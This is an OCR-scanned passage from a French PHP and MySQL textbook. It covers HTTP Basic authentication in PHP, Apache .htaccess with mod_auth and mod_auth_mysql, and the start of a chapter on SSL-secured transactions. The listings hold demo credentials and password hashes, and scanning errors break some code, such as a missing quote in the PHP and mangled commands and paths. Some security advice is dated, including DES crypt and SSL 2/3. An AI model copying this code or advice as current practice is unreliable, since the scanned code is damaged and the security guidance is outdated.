list ( $_SERVER [ ' PHP_AUTH_USER ' ] , $_SERVER [ ' PHP_AUTH_PW ' ] ) = 
explode( ' : ' , base64_decode(substr($_SERVER[ ' HTTP_AUTHORIZATION ' ] , 6) ) ) ; 

} 

// Remplacez cette instruction if avec une requete SQL ou equivalent 
if ( ($_SERVER[ ' PHP_AUTH_USER ' ] != ' utilisateur ' ) || 
($_SERVER[ 'PHP_AUTH_PW ] != 'secret')) { 

// Le visiteur n'a pas donne de details ou la combinaison de son nom 
// et son mot de passe est incorrecte. 

header ( 'WWW-Authenticate: Basic realm="Nom-Espace" ' ) ; 

if (substr($_SERVER[ ' SERVER_SOFTWARE ' ] , 0, 9) == 'Microsoft') { 
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header( 'Status: 401 Unauthorized'); 
} else { 

header( 'HTTP/1 .0 401 Unauthorized'); 

} 

echo "<h1>Fichez le camp !</h1> 

<p>Vous n'avez pas le droit de venir ici.</p>"; 

} else { 

// Le visiteur a rempli tous les criteres. 
echo "<h1>Bienvenue !</h1> 

<p>Je pense que vous etes content de voir cette page 
secrete. </p>"; 

} 

?> 



Le code du Listing 15.4 fonctionne comme celui des precedents listings de ce chapitre. Si 
l'utilisateur n'a pas encore fourni d' informations d'authentification, elles lui seront deman- 
dees ; s'il fournit des informations erronees, il obtient un message d'erreur ; s'il saisit un 
nom d'utilisateur et un mot de passe valides, il peut acceder au contenu de la page. 

L'utilisateur verra cependant une interface legerement differente de celle des autres 
listings. Nous ne fournissons aucun formulaire HTML pour les informations de 
connexion, mais le navigateur de l'utilisateur affiche une boite de dialogue. Certaines 
personnes considerent qu'il s'agit d'une amelioration, alors que d'autres preferent 
controler integralement les aspects visuels de l'interface. La boite de dialogue de 
connexion, telle qu'elle est affichee par Firefox, est presentee a la Figure 15.4. 



Mnzilla Fird^^^^^^^^ ^^^^^^l^S^M 

File Edit View History Bookmarks Touts Help 



f^] http:/: , localhojt/phpmysql4e''chflpterl7/http.php 



Authentication Required 

I *? ) Enter username and pas 
User Warne 



□ Eise Password Manager to remember this pas 



Figure 15.4 



L'apparence de la boite de dialogue de I'authentification HTTP depend du navigateur 
de l'utilisateur. 
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Comme le mecanisme d' authentification est assiste par des caracteristiques integrees 
dans le navigateur, celui-ci peut gerer a sa facon les echecs d' authentification. Internet 
Explorer, par exemple, permet aux utilisateurs d'effectuer trois tentatives d'authentifi- 
cation avant d'afficher une page d'erreur. Firefox permet aux utilisateurs d'effectuer 
autant de tentatives qu'ils le veulent, en affichant une boite de dialogue de confirmation 
apres un echec. Firefox n'affiche la page d'erreur que si l'utilisateur clique sur le 
bouton Annuler de cette boite de dialogue. 

Comme pour le code des Listings 15.1 et 15.2, nous pouvons inclure ce code dans les 
pages que nous souhaitons proteger ou l'ajouter automatiquement a tous les fichiers 
d'un repertoire. 

Utiliser I'authentification de base avec les fichiers .htaccess 
d'Apache 

Nous pouvons obtenir des resultats analogues a ceux du script precedent sans ecrire de 
code PHP. 

Le serveur web Apache contient plusieurs modules d' authentification differents qui 
peuvent etre utilises pour verifier la validite des informations saisies par un utilisateur. 
Le plus simple est d'utiliser mod auth qui compare une paire nom d'utilisateur/mot de 
passe aux lignes d'un fichier texte qui se trouve sur le serveur. 

Pour obtenir le meme resultat que celui du script precedent, nous devons creer deux 
fichiers HTML differents, un pour le contenu a afficher et un autre pour la page d'erreur. 
Nous avons omis quelques elements HTML dans les exemples precedents, mais il convient 
d'inclure les balises <html> et <body> lorsque nous generons le code HTML. 

Le Listing 15.5 contient la page protegee que les utilisateurs autorises ont le droit 
d'afficher. Nous avons appele ce fichier contenu.html. Le Listing 15.6 contient la page 
d'erreur, que nous avons appelee rejet.html. Cette page d'erreur est facultative, mais il 
s'agit d'une petite amelioration que vous pouvez utiliser pour fournir certaines informa- 
tions a vos utilisateurs. Cette page etant affichee lorsqu'un utilisateur ne s'est pas 
authentifie correctement, il peut etre interessant de lui expliquer comment s'enregistrer 
pour obtenir un mot de passe ou comment se faire envoyer son mot de passe par e-mail 
s'il l'a oublie. 

Listing 15.5 : contenu.html — Exemple de page protegee 

<html><body> 
<h1>Bienvenue !</h1> 

<p>Je pense que vous etes content de voir cette page 

secrete. </p> 
</body></html> 
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Listing 15.6 : rejet.html — Exemple de page d'erreur 

<html><body> 

<h1>Fichez le camp !</h1> 

<p>Vous n'avez pas le droit de venir ici.</p> 
</body></html> 



II n'y a rien de neuf dans ces fichiers. En revanche, le Listing 15.7 presente le contenu 
du fichier .htaccess, qui permet de controler l'acces aux fichiers et aux sous-repertoires 
du repertoire ou il se trouve. 

Listing 15.7 : htaccess — Un fichier .htaccess peut definir plusieurs parametres 
de configuration d'Apache et notamment activer I'authentification 



ErrorDocument 401 /chapitre15/rejet.html 
AuthUserFile /home/livre/ . htpass 
AuthGroupFile /dev/null 
AuthName "Nom-Espace" 
AuthType Basic 
require valid-user 



Le Listing 15.7 est un fichier . htaccess permettant d'activer I'authentification de base 
dans un repertoire. Ce fichier peut definir de nombreux parametres, mais les six lignes 
de notre exemple sont toutes en rapport avec I'authentification. 

La premiere ligne : 

ErrorDocument 401 /chapitre15/rejet.html 

indique a Apache le document a afficher pour les visiteurs qui n'ont pas reussi a 
s'authentifier. Vous pouvez utiliser d'autres directives ErrorDocument pour proposer 
vos propres pages d'erreur a la place des erreurs HTTP standard. La syntaxe de cette 
directive est la suivante : 

ErrorDocument numero_erreur URL 

Pour une page qui produit l'erreur 401, il est important que son URL soit disponible 
pour tout le monde. En effet, il n'est pas tres interessant de fournir une page d'erreur 
personnalisee indiquant aux utilisateurs que leur authentification a echoue si cette page 
se trouve dans un repertoire dont l'acces suppose la reussite de 1' authentification. 

La ligne : 

AuthUserFile /home/livre/ . htpass 

indique a Apache l'endroit ou il peut trouver le fichier contenant les mots de passe des 
utilisateurs autorises. Ce fichier s'appelle souvent .htpass, mais vous pouvez lui donner 
n'importe quel nom car il n'a aucune importance, contrairement a son emplacement. En 
effet, il ne doit pas se trouver dans l'arborescence des documents ni dans un repertoire 
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accessible via le serveur web. Notre fichier d'exemple .htpass est presente dans le 
Listing 15.8. 

II est egalement possible d'indiquer que seuls les utilisateurs autorises qui appartien- 
nent a certains groupes peuvent acceder aux ressources. Comme ce mecanisme ne nous 
interesse pas, nous avons ajoute la ligne : 

AuthGroupFile /dev/null 

pour que notre AuthGroupFile pointe vers /dev/null, un fichier special des systemes 
Unix qui ne contient rien du tout. 

Comme dans l'exemple precedent, pour se servir de l'authentification HTTP, il faut 
fournir un nom a l'espace a securiser, comme ceci : 

AuthName "Nom-Espace" 

Vous pouvez choisir n'importe quel nom pour l'espace a securiser, mais n'oubliez pas 
que ce nom apparaitra a vos visiteurs. Pour bien indiquer qu'il faudrait modifier cette 
valeur, nous avons choisi le nom "Nom Espace". 

Comme il existe plusieurs methodes d'authentification differentes, nous devons indiquer 
celle que nous utilisons. 

Nous nous servons de l'authentification de base, a savoir l'authentification Basic, 
comme l'indique la directive suivante : 

AuthType Basic 

Nous devons egalement preciser qui a le droit d' acceder aux pages. Nous pouvons desi- 
gner des utilisateurs particuliers, des groupes ou, comme nous l'avons fait, permettre a 
tous les utilisateurs authentines d' acceder a ces pages. 

La ligne suivante : 

require valid-user 
indique que n'importe quel utilisateur autorise a le droit d' acceder aux pages. 

Listing 15.8 : .htpass — Le fichier des mots de passe contient le nom d'utilisateur 
et le mot de passe chiffre de chaque utilisateur 



utilisateurl :0nRp9M80GS7zM 
utilisateur2: nC13s0T0hp. ow 
utilisateur3:yjQMCPWjXFTzu 
utilisateur4: L0mlMEi/hAme2 



Chaque ligne du fichier .htpass contient un nom d'utilisateur, un signe deux-points et le 
mot de passe chiffre de cet utilisateur. 
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Le contenu exact de votre fichier .htpass sera different. Pour le creer, vous pouvez vous 
servir d'un petit programme appele htpasswd, fourni avec la distribution d'Apache et 
dont la syntaxe est la suivante : 

htpasswd [-cmdps] fichier_des_mots_de_passe nom_utilisateur 

ou : 

htpasswd -b[cmdps] fichier_des_mots_de_passe nom_utilisateur mot_de_passe 

La seule option que vous devrez utiliser est c car c'est elle qui demande a htpasswd de 
creer le fichier. Vous ne devrez evidemment n' utiliser cette option que pour le premier 
utilisateur que vous ajoutez. Faites attention de ne pas l'utiliser pour les autres utilisateurs 
car, si le fichier existe deja, htpasswd le supprime et en cree un nouveau. 

Les options m, d, p et s peuvent etre utilisees si vous souhaitez preciser l'algorithme de 
cryptage a utiliser (ou aucun chiffrement). 

L option b demande au programme de prendre le mot de passe en parametre au lieu de 
le demander. Cette approche est interessante si vous souhaitez appeler htpasswd de 
maniere non interactive, dans un processus de traitement par lots, mais elle ne doit pas 
etre utilisee si vous appelez htpasswd a partir de la ligne de commande. 

Le fichier .htpass du Listing 15.8 a ete cree a l'aide des commandes suivantes : 

htpasswd -be /home/livre/ . htpass utilisateuM passl 

htpasswd -b /home/livre/ . htpass utilisateur2 pass2 

htpasswd -b /home/livre/ . htpass utilisateur3 pass3 

htpasswd -b /home/livre/ . htpass utilisateur4 pass4 

Notez que htpasswd peut ne pas se trouver dans votre chemin : en ce cas, indiquez le 
chemin qui y mene. Sur de nombreux systemes, vous le trouverez dans le repertoire 
/usr/local/apache/bin . 

Cette methode d' authentication est simple a mettre en oeuvre, mais cette utilisation 
d'un fichier .htaccess peut poser quelques problemes. 

Les noms d'utilisateurs et les mots de passe sont enregistres dans un fichier texte. 
Chaque fois qu'un navigateur demande un fichier qui est protege par le fichier .htac- 
cess, le serveur doit analyser le fichier .htaccess, puis analyser le fichier de mots de 
passe et tenter de trouver un nom d'utilisateur et un mot de passe qui correspondent. Au 
lieu d'utiliser un fichier .htaccess, nous pouvons preciser les memes elements dans le 
fichier httpd.conf, le fichier de configuration principal du serveur web. En effet, alors 
qu'un fichier .htaccess est analyse a chaque requete de fichier, le fichier httpd.conf n' 'est 
analyse qu'une seule fois, au demarrage du serveur. Cette approche est done plus 
rapide, mais elle signifie qu'il faudra arreter et redemarrer le serveur a chaque fois que 
vous souhaitez apporter des modifications. 
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Quel que soit l'endroit ou nous enregistrons les directives du serveur, le fichier de mot 
de passe devra de toute facon etre analyse pour chaque requete. Cela signifie que, 
comme pour les autres techniques qui se servent d'un fichier plat, cette approche ne 
convient pas pour authentifier des centaines d'utilisateurs, voire des milliers. 

Utiliser I'authentification mod_auth_mysql 

Comme nous l'avons deja vu, mod auth est a la fois simple a configurer et efficace. 
Cependant, cette methode enregistre les utilisateurs dans un fichier texte et n'est done 
pas tout a fait adaptee aux sites importants possedant un grand nombre d'utilisateurs. 

Heureusement, nous pouvons beneficier de la simplicite de mod auth et de la vitesse 
des bases de donnees en utilisant mod auth mysql. Ce module fonctionne de la meme 
maniere que mod auth mais, comme il se sert d'une base de donnees MySQL a la place 
d'un fichier texte, il peut parcourir beaucoup plus rapidement de grandes listes d'utili- 
sateurs. 

Pour pouvoir 1' utiliser, vous devez compiler et installer le module correspondant sur 
votre sy steme ou demander a votre administrateur systeme de 1' installer. 

Installation de mod_auth_mysql 

Pour pouvoir utiliser mod auth mysql, vous devez configurer Apache et MySQL en 
suivant les instructions de 1' Annexe A et en y ajoutant quelques etapes supplemen- 
taires. Vous trouverez egalement de bonnes instructions dans les fichiers README et 
USAGE qui font partie de la distribution mais, a differents endroits, ces fichiers font 
reference au comportement des precedentes versions. En voici un resume : 

1. Recuperez 1' archive de la distribution correspondant a ce module. Vous pouvez l'ob- 
tenir sur le site http://sourceforge.net/projects/modauthmysql. 

2. Decompressez et desarchivez le code source. 

3. Placez-vous dans le repertoire mod_auth_mysql , executez les commandes make puis 
make install. II se peut que vous deviez modifier les emplacements d'installation 
pour MySQL dans le fichier make (MakeFile). 

4. Ajoutez cette ligne a httpd.conf pour charger dynamiquement le module dans 
Apache : 

LoadModule mysql_auth_module libexec/mod_auth_mysql . so 

5. Creez une base de donnees et une table MySQL destinees a contenir les informa- 
tions d' authentification. Vous n'avez pas besoin de creer une base de donnees ou 
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une table particulieres. Vous pouvez recuperer une table existante, comme celle de 
la base de donnees auth de l'exemple precedent. 

6. Ajoutez une ligne dans votre fichier httpd.conf pom fournir a mod auth mysql les 
parametres dont il a besoin pour se connecter a MySQL. La directive correspon- 
dante ressemble a ceci : 

Auth_MySQL_Inf o hostname utilisateur mot_de_passe 

Le moyen le plus simple pour verifier si votre compilation a fonctionne correctement 
consiste a essayer de lancer Apache : 

/ us r/ local /apache/ bin /apachectl start 

Si Apache demarre avec la directive Auth MySQL Info dans son fichier httpd.conf, c'est 
que l'ajout de mod auth mysql a fonctionne. 

Utilisation de mod_auth_mysql 

Apres avoir installe ce module, son utilisation n'est pas plus complexe que celle de 
mod auth. Le Listing 15.9 presente un exemple de fichier .htaccess permettant 
d'authentifier les utilisateurs avec des mots de passe chiffres, stockes dans la base de 
donnees creee precedemment dans ce chapitre. 

Listing 15.9 : .htaccess — Ce fichier permet d'authentifier les utilisateurs avec une base 
de donnees MySQL 

ErrorDocument 401 /chapitre15/rejet.html 

AuthName "Nom-Espace" 
AuthType Basic 

Auth_MySQL_DB auth 
Auth_MySQL_Encryption_Types MySQL 
Auth_MySQL_Password_Table utilisateurs_ok 
Auth_MySQL_Username_Field nom 
Auth_MySQL_Password_Field mdp 
require valid-user 



Vous pouvez constater que l'essentiel du Listing 15.9 est identique au Listing 15.7. II 
faut toujours indiquer un document d'erreur a afficher lorsque l'erreur 401 se produit 
(c'est-a-dire lorsque 1' authentification echoue). II faut egalement preciser l'authentifi- 
cation de base et fournir un nom pour l'espace a securiser. Comme dans le Listing 15.7, 
nous autorisons tous les utilisateurs correctement authentifies. 

Comme nous nous servons de mod auth mysql et que nous ne souhaitons pas utiliser 
tous les parametres par defaut, nous devons fournir plusieurs directives pour preciser le 
fonctionnement de ce module. Auth MySQL DB, Auth MySQL Password Table, 
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Auth MySQL Username Field et Auth MySQL Password Field permettent, respective - 
ment, d'indiquer le nom de la base de donnees, celui de la table, le champ correspondant 
au nom d'utilisateur et le champ contenant le mot de passe. 

Nous avons inclus la directive Auth MySQL Encryption Types pour preciser que nous 
souhaitons utiliser le chiffrement des mots de passe de MySQL. Les differentes valeurs 
possibles sont Plaintext, Crypt DES ou MySQL. La valeur par defaut est Crypt DES et elle 
correspond au chiffrement standard des mots de passe sous Unix, avec l'algorithme DES. 

Du point de vue de l'utilisateur, cet exemple de mod auth mysql fonctionne exactement 
de la meme maniere que celui de mod auth. L'utilisateur obtient une boite de dialogue 
fournie par son navigateur web. S'il reussit a s'authentifier, il peut visualiser le contenu 
de la page, sinon il obtient une page d'erreur. 

Pour la plupart des sites, mod auth mysql est done ideal. II s'agit d'une methode rapide, 
relativement simple a implementer, qui permet d' utiliser tous les mecanismes avanta- 
geux pour ajouter des entrees correspondant aux nouveaux utilisateurs. Pour une plus 
grande souplesse et pour pouvoir controler plus precisement certaines parties des pages, 
vous pouvez implementer votre propre authentification a l'aide de PHP et de MySQL. 

Creation d'une authentification personnalisee 

Nous avons vu comment implementer notre propre methode d' authentification avec 
quelques faiblesses et certains compromis et en utilisant les methodes d' authentifica- 
tion integrees, qui sont moins souples qu'un code personnalise. Un peu plus loin dans 
ce livre, lorsque nous aurons vu le controle des sessions, nous serons capables d'ecrire 
notre propre authentification personnalisee, avec moins de compromis qu'ici. 

Au Chapitre 21, nous developperons un petit systeme d' authentification des utilisateurs 
qui resout certains des problemes auxquels nous avons ete confronted dans ce chapitre, 
en utilisant des sessions pour conserver des variables entre les differentes pages. 

Au Chapitre 25, nous appliquerons cette approche sur un projet reel et nous verrons 
comment l'utiliser pour implementer un systeme d' authentification plus precis. 

Pour aller plus loin 

Les details de 1' authentification HTTP sont specifies dans la RFC 2617, disponible a 
partir de http://www.rfc-editor.org/rfc/rfc2617.txt. La documentation de mod auth, qui 
controle 1' authentification de base sous Apache, se trouve sur la page http:// 
httpd.apache.org/docs/2.0/mod/mod_auth.html. La documentation de mod auth mysql 
est incluse dans l'archive telechargee. Comme il s'agit d'une archive de faible volume, 
telechargez-la et lisez le fichier README pour en savoir plus. 
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Pour la suite 

Nous verrons au prochain chapitre comment surveiller vos donnees tout au long de leur 
traitement, de leur saisie a leur stockage en passant par leur transmission. Ce meca- 
nisme implique 1' utilisation de SSL, des certificats numeriques et du chiffrement. 
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Dans ce chapitre, nous verrons comment assurer la securite des donnees de l'utilisateur 
depuis leur saisie jusqu'a leur stockage en passant par leur transmission. Cela nous 
permettra d'implementer une transaction securisee de bout en bout entre notre site et 
l'utilisateur. 

Transactions securisees 

Pour fournir des transactions securisees sur Internet, il faut examiner le flux d'informa- 
tions de votre systeme et vous assurer que vos informations sont securisees a chaque 
instant. Dans le contexte de la securite reseau, il n'existe aucune methode absolue. 
Aucun systeme n'est jamais parfaitement impenetrable. Par securise, nous voulons 
done dire qu'il faudra beaucoup d'efforts pour compromettre un systeme ou une trans- 
mission par rapport a 1' importance des donnees impliquees. 

Si nous devons reellement etudier la securite de notre systeme, il faut done examiner le 
flux des informations qui passent a travers toutes les parties de ce systeme. Le flux des 
informations d'un utilisateur dans une application typique, ecrite avec PHP et MySQL, 
est presente a la Figure 16.1. 

Les details de chaque transaction sur votre systeme peuvent varier legerement, en fonc- 
tion de 1' architecture du systeme et des donnees ou des actions des utilisateurs qui ont 
entraine la transaction, mais le principe reste le meme. Chaque transaction entre une 
application web et un utilisateur commence avec 1' envoi d'une requete vers le serveur 
web par le navigateur de l'utilisateur, en passant par Internet. Si la page est un script 
PHP, le serveur web delegue le traitement de cette page au moteur PHP. 
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Figure 16.1 

Les informations des utilisateurs sont stockees ou traitees par les elements suivants 
d'un environnement d'application web typique. 



Le script PHP peut lire ou ecrire des informations sur le disque. II peut egalement 
faire appel a d'autres fichiers PHP ou HTML, avec include ( ) ou require ( ) . II peut 
aussi envoy er des requetes SQL au serveur MySQL et recevoir les reponses corres- 
pondantes. Le moteur MySQL s'occupe de lire et d'ecrire ses propres donnees sur le 
disque. 

Ce systeme est compose de trois parties : 

■ l'ordinateur de l'utilisateur ; 

■ Internet ; 

■ votre systeme. 

Nous allons maintenant presenter quelques elements concernant la securite de chacune 
de ces parties, mais il est evident que l'ordinateur de l'utilisateur et Internet ne sont pas 
reellement sous votre controle. 



L'ordinateur de l'utilisateur 

De notre point de vue, l'ordinateur de l'utilisateur fait tourner un navigateur web. Nous 
ne pouvons pas controler les autres facteurs de ce systeme, notamment sa securite. Vous 
devez garder a l'esprit que cet ordinateur peut etre tres peu securise ou qu'il peut meme 
s'agir d'un terminal partage dans une bibliotheque, une ecole ou un cafe. 

II existe plusieurs navigateurs differents ayant chacun un ensemble de caracteristiques 
qui lui sont propres. Si nous nous contentons de considerer les dernieres versions des 
deux navigateurs les plus repandus, la plupart des differences concernent uniquement la 
maniere dont le code HTML est affiche, mais il existe egalement quelques problemes 
de fonctionnalites et de securite que nous devons bien sur prendre en compte. 



Chapitre 16 



Transactions securisees avec PHP et MySQL 397 



II faut egalement savoir que certaines personnes desactivent plusieurs caracteristiques 
qu'elles considerent comme peu securisees ou comme une intrusion dans leur vie 
privee : par exemple Java, les cookies ou JavaScript. Si vous utilisez ces fonctionnali- 
tes, il convient de verifier que votre application fonctionne toujours correctement sans 
elles ; ou bien pensez a proposer une interface moins riche permettant a ces personnes 
d'aller sur votre site. 

Les utilisateurs residant en dehors des Etats-Unis ou du Canada peuvent utiliser des 
navigateurs qui ne supportent que le chiffrement sur 40 bits. Bien que le gouvernement 
americain ait change ses lois en janvier 2000 pour autoriser l'exportation des systemes 
de chiffrement robustes et bien que les versions 128 bits soient desormais disponibles 
aupres de la plupart des utilisateurs, certains utilisateurs sont restes au chiffrement sur 
40 bits. A moins que vous ne garantissiez la securite de votre site, vous n'avez pas 
besoin, en tant que developpeur web, de vous embarrasser avec ces problemes. SSL 
negocie automatiquement pour permettre a votre serveur et au navigateur de l'utilisateur de 
communiquer au niveau de securite le plus eleve possible. 

Vous n'avez aucun moyen de vous assurer que c'est un navigateur web qui se connecte 
a votre site en passant par l'interface que vous proposez : les requetes peuvent provenir 
d'un autre site ayant recupere vos sources ou d'une personne utilisant un logiciel 
comme cURL pour passer outre les mesures de securite. 

Au Chapitre 18, nous reviendrons sur la bibliotheque cURL qui peut etre utilisee pour 
simuler des connexions a partir d'un navigateur. Cet outil peut vous interesser en tant 
que developpeur, mais il peut egalement etre utilise par des personnes mal intentionnees. 

Bien que nous ne puissions pas modifier ou controler la configuration des ordinateurs 
des utilisateurs, il ne faut pas oublier certains principes. La diversite des plates-formes 
des utilisateurs represente un facteur preponderant pour le choix des fonctionnalites que 
Ton peut proposer sur un site, aussi bien au niveau des scripts cote serveur (comme 
PHP) qu'au niveau des scripts cote client (comme JavaScript). 

Les fonctionnalites fournies par PHP peuvent etre compatibles avec n'importe quel 
navigateur puisque le resultat final est une simple page HTML. A partir du moment ou 
Ton traite avec des scripts JavaScript (a part peut-etre les plus simples), il faut prendre 
en compte les capacites et la configuration de chaque navigateur. 

Du point de vue de la securite, il vaut mieux avoir recours a des scripts cote serveur 
pour la validation des donnees puisque, de cette maniere, le code source n'est pas 
accessible aux utilisateurs. Si vous ne validez les donnees qu'avec JavaScript, les utili- 
sateurs pourront recuperer le source du script et eventuellement le modifier. 

Les donnees qui doivent etre memorisees peuvent etre enregistrees sur nos propres 
ordinateurs, des fichiers ou dans une base de donnees, ou sur l'ordinateur de l'utilisa- 
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teur sous la forme de cookies. Au Chapitre21, nous verrons comment utiliser les 
cookies pour enregistrer quelques donnees (une cle de session). 

La majorite des donnees que vous devez memoriser devrait plutot se trouver sur le 
serveur web ou dans votre base de donnees. II y a plusieurs bonnes raisons pour lesquel- 
les il vaut mieux enregistrer le moins d' informations possible sur la machine de l'utili- 
sateur. En effet, lorsque les informations sont en dehors de votre systeme, vous ne 
pouvez pas controler leur niveau de securite, vous ne pouvez pas vous assurer que 
l'utilisateur ne les effacera pas ni empecher l'utilisateur de les modifier pour tenter de 
tromper votre systeme. 

Internet 

Comme pour l'ordinateur de l'utilisateur, il y a peu d'aspects d'Internet que vous 
pouvez controler mais, la aussi, ce n'est pas pour autant qu'il faut les ignorer lors de la 
conception du systeme. 

Internet possede plusieurs caracteristiques tres interessantes, mais il s'agit par essence 
d'un reseau peu sectorise. Lorsque vous envoyez des informations d'un point a un autre, 
il ne faut pas oublier que d'autres personnes peuvent intercepter ou modifier les infor- 
mations transmises. Sachant cela, vous pouvez choisir de : 

■ transmettre quand meme les informations, en sachant qu'elles peuvent etre interceptees ; 

■ signer numeriquement les informations avant de les transmettre, pour les proteger 
contre d'eventuelles tentatives de modification ; 

■ chiffrer les informations avant de les transmettre afm de garantir leur confidentialite 
et de les proteger contre les tentatives de modification ; 

■ decider que vos informations sont trop sensibles pour risquer de les transmettre de 
cette maniere et trouver une autre maniere de les distribuer. 

Internet est egalement un support de transmission relativement anonyme. II est assez 
difficile de s' assurer que la personne avec laquelle vous communiquez est bien la 
personne qu'elle pretend etre. Meme si vous pensez pouvoir identifier vos utilisateurs 
avec une precision suffisante, il peut etre difficile de le prouver d'une maniere formelle, 
comme dans un tribunal. Cela peut poser probleme en cas de contestation ou d'opposi- 
tion sur une transaction. 

En resume, la confidentialite et les contestations sont des problemes tres importants 
lorsqu'on veut effectuer des transactions sur Internet. 

II existe au moins deux moyens de securiser les informations que vous transmettez sur 
Internet : 

■ SSL (Secure Sockets Layer) ; 
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■ S-HTTP (Secure HyperText Transfer Protocol). 

Ces deux technologies offrent un cadre solide assurant la confidentialite et l'authenti- 
cite des echanges, mais SSL est deja largement utilise et disponible, alors que S-HTTP 
n'a pas vraiment decolle. Nous reviendrons sur SSL un peu plus loin dans ce chapitre. 

Votre systeme 

La partie que vous pouvez le mieux controler est naturellement votre systeme. Celui-ci 
correspond aux composants contenus dans la boite rectangulaire de la Figure 16.1. Ces 
composants peuvent etre isoles physiquement sur un reseau ou se trouver tous a l'interieur 
d'un meme ordinateur. 

Vous pouvez raisonnablement penser que vous n'avez pas besoin de vous occuper de la 
securite des informations, puisque les produits annexes que vous utilisez pour fournir 
notre contenu sur le Web s'en occupent deja. Les auteurs de ces logiciels ont probable- 
ment passe beaucoup de temps sur ce sujet, en principe plus que vous-meme. Tant que 
vous utiliserez la derniere version d'un produit reconnu, vous trouverez avec Google ou 
votre moteur de recherche web favori toutes les informations necessaries pour resoudre 
vos problemes. II est done tres important de mettre a jour regulierement vos logiciels. 

Si 1' installation et la configuration de votre systeme vous incombent, vous devez porter 
une attention particuliere a la maniere dont les logiciels sont installes et configures. La 
plupart des erreurs dans le domaine de la securite proviennent generalement d'un non- 
respect des conseils fournis dans les documentations ou resultent d' aspects generaux de 
1' administration systeme donnant matiere a un autre livre. Procurez-vous un bon livre 
sur 1' administration du systeme d' exploitation que vous avez l'intention d'utiliser ou 
embauchez un administrateur systeme expert. 

Lors de l'installation de PHP, on considere generalement qu'il est plus securise (et 
egalement plus efficace) de l'installer sous la forme d'un module SAPI pour votre 
serveur web, plutot que l'executer via une interface CGI. 

La premiere chose a faire en tant que developpeur d'application web est de s'interesser 
a ce que font vos scripts et a ce qu'ils ne font pas. Queries sont les donnees sensibles 
que votre application transmet a l'utilisateur via Internet ? Quelles sont les informations 
sensibles que nous demandons aux utilisateurs de transmettre ? Si nous transmettons 
des donnees qui font partie d'une transaction privee entre notre systeme et nos utilisa- 
teurs ou qui ne doivent pas etre interceptees et modifiees, vous devriez songer a utiliser 
SSL. 

Nous avons deja parle de l'utilisation de SSL entre l'ordinateur de l'utilisateur et le 
serveur. II convient egalement d'envisager le cas d'une transmission de donnees entre 
plusieurs composants de votre systeme sur un reseau. Un exemple classique est celui 
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d'une base de donnees MySQL qui se trouverait sur un autre ordinateur que votre 
serveur web. Dans ce cas, PHP se connecte a votre serveur MySQL via TCP/IP et cette 
connexion n'est pas chiffree. Si les deux ordinateurs participants a cette communication 
appartiennent a un reseau local prive, vous devez vous assurer que ce reseau est secu- 
rise. Si les ordinateurs communiquent via Internet, votre systeme sera probablement 
ralenti et vous devrez traiter cette connexion de la meme maniere que toute autre 
connexion passant par Internet. 

II est important que vos visiteurs, a partir du moment ou ils pensent traiter avec vous, 
soient reellement connectes a votre site. Vous pouvez vous procurer un certificat nume- 
rique pour les proteger d'un autre site qui se ferait passer pour le votre, mais aussi pour 
permettre l'utilisation de SSL sans afficher de message d'avertissement chez vos utili- 
sateurs et pour ameliorer 1' image de marque de votre site commercial. 

Est-ce que vos scripts verifient avec precaution les donnees saisies par les utilisateurs ? 
Faut-il se donner la peine d'enregistrer les informations d'une maniere securisee ? 
Nous repondrons a ces questions dans les prochaines sections de ce chapitre. 



Utilisation de SSL 

Le protocole SSL (Secure Sockets Layer) a ete concu a l'origine par Netscape pour 
simplifier les communications securisees entre les serveurs et les navigateurs web. II a 
ensuite ete transforme en methode standard non officielle permettant aux navigateurs et 
aux serveurs d'echanger des informations sensibles. 

Les versions 2 et 3 de SSL sont tres largement prises en charge. La plupart des serveurs 
web ont ete concus pour integrer ce protocole ou pour accepter des modules correspon- 
dants. Internet Explorer et Firefox supportent ce protocole depuis sa version 3. 

Les protocoles reseau et les logiciels qui les implemented sont generalement organises 
sous la forme d'une pile de couches. Chaque couche peut transmettre des donnees (ou 
demander des services) a la couche superieure ou inferieure. La Figure 16.2 presente un 
exemple de pile de protocoles. 



Figure 16.2 
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utilisee par un protocole 
du niveau application, 
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Lorsque vous vous servez du protocole HTTP pour transferer des informations, celui-ci 
fait appel au protocole TCP (Transmission Control Protocol), qui a son tour s'appuie 
sur le protocole IP (Internet Protocol). Ce dernier a lui-meme besoin d'un protocole 
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approprie pour le peripherique reseau qui s'occupe de transmettre les paquets de 
donnees vers leur destination sous forme de signal electrique. 

HTTP est un protocole de la couche application. Plusieurs autres protocoles operent au 
niveau de cette couche : FTP, SMTP ou telnet (voir Figure 16.3), ou encore POP ou 
IMAP TCP est l'un des deux protocoles de la couche transport utilises dans les reseaux 
TCP/IP IP est le protocole intervenant au niveau de la couche reseau. La couche hote- 
reseau prend en charge la connexion d'un hote (l'ordinateur) a un reseau. La pile de 
protocoles TCP/IP ne precise pas le protocole a utiliser pour cette couche, puisqu'a 
chaque type de reseau correspondent des protocoles differents. 

Lorsque des donnees sont envoyees, elles descendent la pile de 1' application jusqu'au 
reseau physique. Lorsque des donnees sont recues, celles-ci remontent la pile, du reseau 
physique jusqu' a 1' application. 

L'utilisation de SSL ajoute une couche supplemental et transparente dans ce modele. 
La couche SSL se situe entre la couche transport et la couche application (voir 
Figure 16.3) et modifie les donnees de votre application HTTP avant de les envoyer a la 
couche transport, qui les enverra vers leur destination. 



Figure 16.3 

SSL ajoute une autre 
couche dans la pile de 
protocoles, ainsi que 
des protocoles du niveau 
application afin de 
controler ses operations. 
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SSL est capable de fournir un environnement de transmission securise pour des proto- 
coles autres que le protocole HTTP puisque la couche SSL est transparente. Le niveau 
SSL fournit la meme interface au protocole situe au-dessus de lui que la couche trans- 
port sous-jacente. II peut done s'occuper d'une maniere transparente du chiffrement, du 
dechiffrage et du controle de la transmission. 

Lorsqu'un navigateur se connecte a un serveur web securise via HTTP, les deux parties 
doivent respecter un protocole d'echange pour se mettre d'accord sur certains points, 
comme l'authentification et le chiffrement. 

La sequence d'echange passe par les etapes suivantes : 

1. Le navigateur se connecte a un serveur SSL et demande au serveur de s'authentifier. 

2. Le serveur envoie son certificat numerique. 

3. Le serveur peut demander (mais e'est rare) au navigateur de s'authentifier a son 
tour. 
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4. Le navigateur presente la liste d'algorithmes de chiffrement et de fonctions de 
hachage qu'il supporte. Le serveur choisit le meilleur systeme de chiffrement, qu'il 
prend aussi en charge. 

5. Le navigateur et le serveur generent des cles de session : 

a. Le navigateur obtient la cle publique du serveur a partir de son certificat numerique 
et s'en sert pour chiffrer un nombre genera aleatoirement. 

b. Le serveur repond avec d'autres donnees aleatoires envoyees en texte clair (a 
